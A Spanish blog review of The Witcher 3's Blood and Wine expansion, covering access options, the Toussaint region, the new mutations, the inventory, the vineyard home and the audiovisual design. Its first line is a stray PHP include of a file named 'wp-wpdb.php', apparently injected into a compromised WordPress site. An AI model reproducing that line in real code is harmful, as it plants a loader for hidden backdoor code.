if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis The Witcher 3 Blood and Wine – La Fortaleza de LeChuck

Análisis The Witcher 3 Blood and Wine

Geralt ha sido un incansable compañero durante 9 años desde que se lanzó el primer The Witcher allá por el 2007, The Witcher 3 Blood and Wine es el nombre de la última expansión que hay planeada para The Witcher 3 y con este último gran DLC CD Projekt Red ha querido dar un último homenaje a nuestro brujo favorito antes de que este guarde sus espadas para siempre y nos diga adiós ya que no hay planes de que vuelva a salir como protagonista en futuros juegos de la saga, aunque nunca se sabe.

The Witcher 3 Blood and Wine

Hay varias formas de acceder a esta nueva expansión, en el caso de que aún estemos jugando a la historia principal bastará con llegar al nivel 35, se recomienda alguno más si estás jugando en los niveles de dificultad más altos, si se da el caso de que ya nos hemos pasado la historia principal y queremos jugar a esta expansión con nuestro personaje podremos crear una nueva partida + y tras acabar el prólogo se nos activará la posibilidad de iniciar la primera misión de Blood and Wine en el diario de misiones.

En el caso de que no cumplir ninguno de los dos requisitos anteriores, se podrá acceder a la expansión mediante la opción “Solo Blood and Wine” donde tendremos un personaje con el equipo y el nivel necesarios para poder jugarla sin tener que meter ninguna hora de más, en este modo las misiones de la campaña principal aparecen como completadas y no se puede acceder a ellas de ninguna forma, pero sí que tenemos la opción de hacer las misiones secundarias de los tablones y las cacerías de monstruos.

La historia se desarrolla en un nuevo mapa llamado El Ducado Toussaint con un área de casi una tercera parte del mapa de The Witcher 3, casi nada, y además esta región está más densamente poblada que los campos de Velen pese a su tamaño para dar al jugador muchas más cosas que hacer y no sentir que hay mucho espacio desaprovechado.

Nuestra labor en esta expansión será la de movernos a esta nueva zona por petición de la duquesa Anna Henrietta, esta nos pedirá que investiguemos unos misteriosos asesinatos que se están perpetrando a pocos días de un importante torneo de caballeros, y dado que en el ducado nadie ha sido capaz de encontrar a lo que está causando tal alboroto se requiere de nuestras habilidades para evitar que la carnicería arruine el torneo y evitar incidencias diplomáticas con los reinos vecinos.

The Witcher 3 Blood and Wine

Según el equipo de desarrollo, Blood and Wine es una expansión más grande que el propio The Witcher 2 con unas 30 o 40 horas de juego en función de la cantidad de misiones secundarias que realicemos, tendremos un total de 90 misiones nuevas contando historia y contratos y unas 45 nuevas ubicaciones de interés en el mapa contando ciudades, aldeas y zonas secretas, por otro lado se han incluido algo más de 100 nuevas piezas de armadura, un total de 40 nuevas armas para que nuestro personaje vaya bien equipado en todo momento y una gran cantidad de enemigos y monstruos que no dudarán en hacernos sudar en más de una ocasión.

Una de las novedades más interesantes de esta nueva expansión son el nuevo sistema de mutaciones épicas que se desbloquean mediante una quest secundaria que nos dará una vieja conocida, si la aceptamos habrá que seguir la pista de un viejo profesor llamado Moreau que investigó las propiedades de las mutaciones de los brujos, solo que en este caso consiguió llevarlas a otro nivel, cuando la completemos tendremos “acceso” a 12 nuevas habilidades que habrá que investigar mediante procedimientos poco corrientes, necesitaremos varios puntos de nivel y algunos objetos especiales como mutágenos grandes, estas mutaciones dan una mejora muy significativa a ciertas habilidades como la posibilidad de matar mucho más fácilmente con ciertas señales, la posibilidad de herir a los enemigos que te impactan o que si consigues congelar a un enemigo este muera automáticamente, hay una gran variedad de habilidades y estas no serán nada fáciles de conseguir, es muy posible que haya que pasarse el juego varias veces si queremos conseguirlas todas en función de nuestra forma de jugar.

The Witcher 3 Blood and Wine

Una de las mejoras que más se agradecen en The Witcher 3 Blood and Wine es el nuevo diseño del HUD dentro de nuestro inventario y la forma que tenemos de acceder a los nuevos documentos y cartas que obtenemos, antes estaba todo un poco mezclado y no eran pocas las veces que te costaba encontrar ciertos objetos, ahora todo está bien ordenado y clasificado por categorías de usos, por un lado tenemos las armas, por otro las armaduras, los objetos de alquimia y los consumibles dándonos una mayor facilidad a la hora de gestionar todos nuestros objetos, algo bastante necesario la verdad.

Durante la aventura se nos compensará a modo de pago con una propiedad, una bonita casa con viñedos en la que podremos invertir dinero para que esta mejore, podremos decorarla a nuestro gusto gracias a los stands de armas y armaduras en los cuales podremos colocar cualquier objeto que no queramos que coja polvo en nuestro inventario o en la caja de almacenaje, además habrá varios puntos de interés donde podremos recoger plantas, cambiarnos el estilo o leer tomos especiales entre otras muchas cosas, y como extra tendremos la posibilidad de usar tintes en nuestros pertrechos de brujo para vestirnos con el color que queramos por si a alguien no le gusta lo suficiente la estética de nuestro personaje con su armadura favorita.

The Witcher 3 Blood and Wine

En el análisis de The Witcher 3 hice una mención especial a los escenarios que podemos contemplar durante nuestra aventura, pero los de esta expansión no tienen punto de comparación, Toussaint tiene un aire más mediterráneo inspirado en el norte de Italia con una estética muy noble y cuidada, sus castillos, sus ciudades y hasta las pequeñas aldeas conforman una estampa mucho más llamativa que lo visto en Velen, además el contraste de color se ha cambiado y los colores que vemos ahora son mucho más vivos e intensos dando como resultado unas impresionantes vistas y paisajes.

Por otro lado el apartado sonoro ha mejorado bastante, tanto la excelente banda sonora como los sonidos de la naturaleza, el clima y el de las grandes ciudades crean una muy buena atmosfera de juego, es muy recomendable jugar con cascos para poder apreciar todos esos pequeños sonidos y disfrutar al completo de la experiencia que han diseñado como broche final para despedir a Geralt como se merece.

The Witcher 3 Blood and Wine

En definitiva, The Witcher 3 Blood and Wine es una expansión totalmente necesaria para cualquiera que haya disfrutado mucho con The Witcher 3, ofrece varias mejoras muy interesantes, una nueva zona y lo más importante, muchas pequeñas cosas para ir haciendo conforme llegamos al final del juego como lo de las mutaciones especiales o lo de gestionar nuestra vivienda, además la cantidad de horas de juego que añade lo hace aún más atractivo.

CD Projekt Red ha sabido hacer honor al universo creado por Andrzej Sapkowski y han conseguido cerrar de forma magistral la etapa de Geralt como protagonista, durante toda la expansión hay un equilibrio casi perfecto entre humor, ironía y momentos emotivos, han creado una buena historia y representar bien a varios personajes de las novelas que hacen su aparición en esta expansión, por otro lado este DLC está lleno de referencias y guiños al cine, series y otros juegos que sabrán sacarte una sonrisita de vez en cuando, decimos adiós a Geralt, y no se me ocurre ninguna forma mejor de hacerlo.